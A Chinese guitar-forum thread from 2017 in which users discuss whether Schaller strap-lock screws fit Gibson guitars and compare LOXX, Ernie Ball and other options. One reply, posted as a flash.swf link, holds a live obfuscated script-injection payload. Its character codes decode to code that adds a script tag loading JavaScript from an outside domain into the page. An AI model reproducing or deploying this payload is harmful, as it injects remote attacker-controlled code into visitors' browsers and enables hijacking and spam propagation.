cltevolution 发表于 2017-3-20 15:25:35

schallar的背带扣貌似不适用于gibson

买了套schalar的防滑背带扣想给大G换上,结果发现大G的前后两个钉螺丝长度不一样,前短后长,而且也比schalar的螺丝要粗些
勉强换上了,虽然也拧紧了,但总觉得不太靠谱,尤其是尾钉,比原配的细,会不会掉下来啊
有经验的来指点一下吧
或者有哪个牌子的背带扣适用于G的

新闻主编 发表于 2017-3-20 18:52:46

应该问题不大吧,实在不行的话可以保留原厂的螺丝

cltevolution 发表于 2017-3-20 20:02:42

新闻主编 发表于 2017-3-20 18:52
应该问题不大吧,实在不行的话可以保留原厂的螺丝

前面的就必须用原来的
后面的s的螺丝又短,我是用了ernie ball的螺钉刚好一样长

cn_steven 发表于 2017-3-20 21:22:53

是Schaller 么? les paul reissue用8''的螺丝, schaller原厂是6'', 而且螺丝reissue的螺丝头稍大,需要打磨。 有很多人用Schaller螺丝加牙签的方法。
如果自己打磨不方便的话,可以找他们定 http://www.mojoaxe.com/ 已经改好的螺丝。我是自己打磨的,如果有合适的工具不是很困难。

yaoyaosama 发表于 2017-3-22 16:46:26

最好是买个模型锉,保留g的原钉。

cltevolution 发表于 2017-3-22 21:18:33

cn_steven 发表于 2017-3-20 21:22
是Schaller 么? les paul reissue用8''的螺丝, schaller原厂是6'', 而且螺丝reissue的螺丝头稍大,需要打磨 ...

我用的ernie ball的螺丝,长度和G的一样
G的螺丝质量太次了,拧突了几下就拧花了

cltevolution 发表于 2017-3-22 21:23:59

yaoyaosama 发表于 2017-3-22 16:46
最好是买个模型锉,保留g的原钉。

前面的保留了,后面的没用
总担心背时间长了会不会螺丝脱落

slash-7 发表于 2017-3-23 09:32:21

用原琴螺丝就行了

cltevolution 发表于 2017-3-23 21:31:26

slash-7 发表于 2017-3-23 09:32
用原琴螺丝就行了

尾钉是粗的,进不去孔

3015 发表于 2017-3-23 22:47:29

LOXX螺丝粗

cltevolution 发表于 2017-3-24 13:49:51

3015 发表于 2017-3-23 22:47
LOXX螺丝粗

适用于G吗

cltevolution 发表于 2017-3-24 13:52:33

cn_steven 发表于 2017-3-20 21:22
是Schaller 么? les paul reissue用8''的螺丝, schaller原厂是6'', 而且螺丝reissue的螺丝头稍大,需要打磨 ...

在这订还真挺麻烦的
还有其它方法吗

heisyh 发表于 2017-3-24 14:15:31

我用的LOXX 毫无压力啊

cltevolution 发表于 2017-3-24 14:55:18

heisyh 发表于 2017-3-24 14:15
我用的LOXX 毫无压力啊

和原装螺丝一模一样吗

heisyh 发表于 2017-3-24 15:11:39

cltevolution 发表于 2017-3-24 14:55
和原装螺丝一模一样吗

螺纹差不多 但是好像短点儿 不过无所谓啊

cltevolution 发表于 2017-3-24 15:17:59

heisyh 发表于 2017-3-24 15:11
螺纹差不多 但是好像短点儿 不过无所谓啊

粗细一样吗

heisyh 发表于 2017-3-24 15:35:59

嗯 感觉差不多 拧进去力度刚好

Xin願 发表于 2017-3-24 15:43:03

用了一年多,没发现松动

cltevolution 发表于 2017-3-24 16:16:00

Xin願 发表于 2017-3-24 15:43
用了一年多,没发现松动

请问用的啥的背带扣

Xin願 发表于 2017-3-24 18:19:36

就和你一样的啊,螺丝比原装短,也稍微细一点,但是不会松动
发自吉他中国iPhone客户端

cataroo 发表于 2017-3-24 19:55:36

schaller自带一长一短两套螺丝,应该不会有什么压力。。。如果嫌细的话补点木工胶就行。。。

3015 发表于 2017-3-24 21:35:04

我用的是schaller,很可靠,而且现在还出长螺丝了。LOXX也有长螺丝版的,不用扩背带。考虑过买新背带弄对儿LOXX,但一直也没买。。

minzhi5255 发表于 2017-3-24 22:36:42

应该问题不大的

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

假鱼 发表于 2017-3-25 10:52:29

loxx 用原来的螺丝就行 schallar,eb,dunlop那些算上快拆扣都伸出来太长了 在lesaul上背带前面的扣是往外拽的 太不安全了

cltevolution 发表于 2017-3-26 09:33:59

cataroo 发表于 2017-3-24 19:55
schaller自带一长一短两套螺丝,应该不会有什么压力。。。如果嫌细的话补点木工胶就行。。。

这个确实细一小圈

cltevolution 发表于 2017-3-26 09:37:47

假鱼 发表于 2017-3-25 10:52
loxx 用原来的螺丝就行 schallar,eb,dunlop那些算上快拆扣都伸出来太长了 在lesaul上背带前面的扣是往外拽 ...

你的意思是往外的距离远,容易拽掉?
不会吧,这么多家设计不会那么失败吧

假鱼 发表于 2017-3-26 11:31:07

cltevolution 发表于 2017-3-26 09:37
不会吧,这么多家设计不会那么失败吧 ...

对啊 因为lespual的背带你挂好之后 实际上是接近垂直上下拉住背带扣的 我对比过很多 loxx还真就是最短的

假鱼 发表于 2017-3-26 11:32:41

cltevolution 发表于 2017-3-26 09:37
不会吧,这么多家设计不会那么失败吧 ...

schallar eb dunlop这些在其他琴上都还可以 但是前扣在背后的也不行比如flyinV和SG 尤其是shcallar顶你的肚子

yangjianxunozzy 发表于 2017-3-26 11:37:43

3015 发表于 2017-3-23 22:47
LOXX螺丝粗

背上G一段时间前背带扣就卸不下来了。

iceage 发表于 2017-3-26 11:37:51

牙签~~~~~

greenline1987 发表于 2017-3-26 12:52:09

dunlop的适合

cltevolution 发表于 2017-3-26 19:43:43

greenline1987 发表于 2017-3-26 12:52
dunlop的适合

前面兄弟说不合适啊

cltevolution 发表于 2017-3-29 20:45:37

假鱼 发表于 2017-3-26 11:32
schallar eb dunlop这些在其他琴上都还可以 但是前扣在背后的也不行比如flyinV和SG 尤其是shcallar顶你的 ...

LOXX的螺丝比G前钉粗的多,上不上
现在我是前边用了schaller,后边用的LOXX    觉得心里好难受

假鱼 发表于 2017-3-30 10:43:37

cltevolution 发表于 2017-3-29 20:45
LOXX的螺丝比G前钉粗的多,上不上
现在我是前边用了schaller,后边用的LOXX    觉得心里好难受 ...
。。。。你可以直接用原来的螺丝的 G虽然前后螺丝不一样 但是可以直接拿来用的 我后来比较喜欢皮背带但是挺贵的不可能一个吉他配一个 所以才会研究这种快拆扣 用了很多 我自己用起来最好的还是loxx

eager 发表于 2017-3-30 11:41:44

其实有点儿动手能力的人,给Gibson换Schaller背带钉不是啥难事儿,只不过因为Gibson的原配背带钉螺丝的直径和螺纹分布密度很隔路,在给Gibson更换Schaller背带钉之前需要自己加工一下背带钉螺丝穿孔和Gibson的原配螺丝钉沉头而已。我自己的三把G都是这么mod的背带头,效果很理想,主要好处是在不伤到G木头的情况下换好了Schaller背带扣,跟自己其它的琴完全统一了背带扣。另外,大伙没必要因为要换统一的Schaller背带扣而为每把琴都配一整套Schaller,因为Fender也有一款跟Schaller完全同规格和品质的独立包装背带钉,淘宝里就有。用几条背带,买几整套Schaller就行了。

heavehit 发表于 2017-3-30 11:44:57

我碰到的问题跟你一模一样,后来我是买了瓶木工胶直接把琴尾钉螺钉固定在琴上的。个人感觉ERNIBALL的更好看一些。

cltevolution 发表于 2017-3-30 19:41:07

假鱼 发表于 2017-3-30 10:43
。。。。你可以直接用原来的螺丝的 G虽然前后螺丝不一样 但是可以直接拿来用的 我后来比较喜欢皮背带但是 ...

LOXX的螺丝不是一体的吗,怎么可能用G原配螺丝啊

假鱼 发表于 2017-3-30 20:49:43

cltevolution 发表于 2017-3-30 19:41
LOXX的螺丝不是一体的吗,怎么可能用G原配螺丝啊
我刚开看了看 还真是哦 记错啦!我就是用它自带的工具直接拧进去的

tErr! 发表于 2020-11-7 11:12:45

eager 发表于 2017-3-30 11:41
其实有点儿动手能力的人,给Gibson换Schaller背带钉不是啥难事儿,只不过因为Gibson的原配背带钉螺丝的直径 ...

请问用什么工具可以搓背带钉的孔和g螺丝钉的头
页: [1]
查看完整版本: schallar的背带扣貌似不适用于gibson